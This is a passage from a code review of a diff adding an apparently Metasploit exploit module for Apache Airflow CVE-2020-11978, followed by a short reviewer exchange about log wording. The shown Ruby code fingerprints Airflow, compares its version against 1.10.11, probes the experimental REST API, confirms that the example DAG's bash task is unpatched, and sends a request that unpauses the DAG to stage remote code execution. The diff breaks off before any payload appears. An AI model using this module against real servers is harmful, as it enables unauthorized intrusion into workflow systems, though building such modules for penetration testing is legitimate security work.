modules/exploits/multi/http/apache_airflow_dag_rce.rb

```diff
@@ -0,0 +1,265 @@
+    uri = normalize_uri(target_uri.path, 'admin', 'airflow', 'login')
+    print_status("Checking target web server for a response at: #{full_uri(uri)}")
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => uri
+    })
+
+    unless res
+      return CheckCode::Unknown('Target did not respond to check request.')
+    end
+
+    unless res.code == 200 &&
+           res.body.downcase.include?('admin') &&
+           res.body.downcase.include?('_csrf_token') &&
+           res.body.downcase.include?('sign in to airflow')
+      return CheckCode::Unknown('Target is not running Apache Airflow.')
+    end
+
+    print_good('Target is running Apache Airflow.')
+
+    print_status('Checking Apache Airflow version...')
+    version_number = res.body.to_s.scan(
+      %r{<a href="https://airflow[.]apache[.]org/docs/([\d.]+)"}
+    ).flatten.first
+
+    unless version_number
+      return CheckCode::Detected('Apache Airflow version cannot be determined.')
+    end
+
+    print_good("Target is running Apache Airflow Version #{version_number}.")
+
+    if Rex::Version.new(version_number) < Rex::Version.new('1.10.11')
+      return CheckCode::Appears
+    end
+
+    return CheckCode::Safe
+  end
+
+  def check_api
+    uri = normalize_uri(target_uri.path, 'api', 'experimental', 'test')
+    print_status("Checking if Airflow Experimental REST API is accessible at: #{full_uri(uri)}")
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => uri
+    })
+
+    unless res && res.code == 200
+      fail_with(Failure::NotFound, 'Could not access the Airflow Experimental REST API.')
+    end
+
+    print_good('Airflow Experimental REST API is accessible.')
+  end
+
+  def check_task
+    uri = normalize_uri(target_uri.path, datastore['DAG_PATH'], 'tasks', 'bash_task')
+    print_status('Checking for vulnerability of "example_trigger_target_dag.bash_task"...')
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => uri
+    })
+
+    unless res && res.code == 200
+      fail_with(Failure::NotVulnerable,
+                'Could not find "example_trigger_target_dag.bash_task". ' \
+                'Target is not vulnerable to CVE-2020-11978.')
+    end
+
+    if res.get_json_document['env'].include?('dag_run')
+      fail_with(Failure::NotVulnerable,
+                'The "example_trigger_target_dag.bash_task" is patched. ' \
+                'Target is not vulnerable to CVE-2020-11978.')
+    end
+
+    print_good('The "example_trigger_target_dag.bash_task" is vulnerable.')
+  end
+
+  def check_unpaused
+    uri = normalize_uri(target_uri.path, datastore['DAG_PATH'], 'paused', 'false')
+    print_status('Checking if "example_trigger_target_dag.bash_task" is enabled...')
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => uri
+    })
+
+    unless res && res.code == 200
+      fail_with(Failure::UnexpectedReply,
+                'Could not enable "example_trigger_target_dag.bash_task". ' \
```

Comment:
Are we doing something to enable this, or just checking to see if it is enabled?

Reply:
Wrote clearer log messages in 1188ce1e3445fcbd735e8a37afad5c90471cc844